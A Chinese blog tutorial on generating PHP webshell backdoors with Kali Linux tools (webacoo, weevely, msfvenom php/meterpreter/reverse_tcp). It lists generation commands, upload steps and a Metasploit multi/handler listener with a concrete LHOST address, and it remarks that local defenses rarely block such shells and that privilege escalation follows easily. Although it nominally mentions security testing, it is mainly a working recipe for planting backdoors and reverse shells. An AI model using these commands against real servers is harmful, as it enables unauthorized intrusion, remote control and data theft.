kali如何制作php字典_kali下生成web端后门

本文介绍如何使用Kali Linux自带的工具如webacoo、weevely及PHPMeterpreter生成独特的WebShell,实现对目标服务器的安全测试。文中详细解释了每种工具的使用方法及其注意事项。

很多时候在***测试时选择web***害怕用的别人的马带有后门,这样自己的辛苦就要被别人不劳而获,很多时候我们都想拥有自己的马,那么这个时候你就应该使用kail来生成一个自己独特密码的web***了。

Kali Linux自带有好几个web***生成工具,下面我们来简单看几个:

1.webacoo后门

webacoo  -g -o test.php

-g 制作后门代码

-o 输出生成指定的后门程序文件名

把web后门上传到目标服务器后

使用kali linux访问如下

注意:上传的路径一定要正确

最后退出的时候使用exit退出

2.weevely

查看帮助信息

生成后门

下列命令可以生产混搅PHP backdoor , 密码password 后门名字disaplay.php

weevely generate password disaplay.php

把后门文件上传到服务器后,如下命令可以成功访问

通过help看到weevely有很多的module

.net.ifaces 查看服务器的端口信息

.net.scan 202.205.xx.xx 22   对服务器某个端口扫描

3.PHP Meterpreter

metasploit有一个名为PHP Meterpreter的payload,可创建具有meterpreter功能的PHP webshell。

Metasploit的msfvenom工具可以制作PHP Meterpreter,命令如下:

msfvenom  -p  php/meterpreter/reverse_tcp LHOST=自己监听的IP -f raw > php_meter.php

-p 设置payload

-f 设置输出文件格式

但是使用前需要注意生成文件的第一行被注释了,所以需要把注释去掉才能使用

把webshell上传到目标服务器,本地监听打开如下:

启动msfconsole

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set LHOST 202.205.7.162

然后我们就可以使用kali的metasploit功能对目标服务器进行一系列操作。

这种WEBSHELL 利用起来相当方便,输入shell命令之后,就可以随便提权什么的了.1,国内的貌似没有防护这块的,国内大多只防护GET POST COOKIE这些数据.2,缺点是如果服务器在DMZ,则失效.3,more what .....   这种shell如果被利用多了,肯定会有硬件厂商去做防护的.

评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符  | 博主筛选后可见
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值